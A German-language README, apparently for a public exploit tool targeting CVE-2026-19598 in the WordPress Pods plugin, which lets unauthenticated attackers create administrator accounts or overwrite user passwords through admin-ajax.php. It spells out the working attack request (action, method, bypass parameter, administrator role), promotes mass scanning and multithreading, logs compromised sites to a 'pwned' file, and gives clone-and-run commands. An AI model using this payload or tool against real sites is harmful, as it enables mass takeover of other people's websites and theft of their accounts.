
Exploitiert CVE-2026-19598 im WordPress-Pods-Plugin, um Admin-Konten zu erstellen oder Passwörter über eine nicht authentifizierte AJAX-Anfrage zu überschreiben, mit Unterstützung für Massen-Scans und Multithreading.
Kritische Unauthenticated Privilege Escalation (CVSS 9.8) — WordPress Pods Plugin ≤ 3.3.9
Dieses Tool nutzt CVE-2026-19598 aus, eine Schwachstelle im WordPress-Pods-Plugin, die es nicht authentifizierten Angreifern ermöglicht, neue Administrator-Konten zu erstellen oder bestehende Benutzerpasswörter über den admin-ajax.php-Endpunkt zu überschreiben.
| Eigenschaft | Wert |
|---|---|
| CVE-ID | CVE-2026-19598 |
| CVSS-Score | 9.8 (Kritisch) |
| CWE | CWE-284 — Unzureichende Zugriffskontrolle |
| Betroffenes Produkt | WordPress Pods Plugin ≤ 3.3.9 |
| Gepatchte Version | 3.3.9.1 |
| Authentifizierung erforderlich | NEIN (nicht authentifiziert) |
| Status | Aktive Ausnutzung |
Die Schwachstelle existiert in der AJAX-Aktion pods_admin. Aufgrund unzureichender Berechtigungsprüfungen kann die Methode save_user ohne Authentifizierung aufgerufen werden, wenn der Parameter meta-box-loader vorhanden ist. Dies ermöglicht einem Angreifer:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
Das Plugin prüft nicht, ob der Benutzer, der die Anfrage stellt, über die entsprechenden Berechtigungen verfügt, und der Parameter meta-box-loader umgeht die vorgesehenen Sicherheitsprüfungen.
pods_pwned.txt mit allen ausgenutzten Zielenrequests# Repository klonen
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# Abhängigkeiten installieren (nur requests benötigt)
pip install requests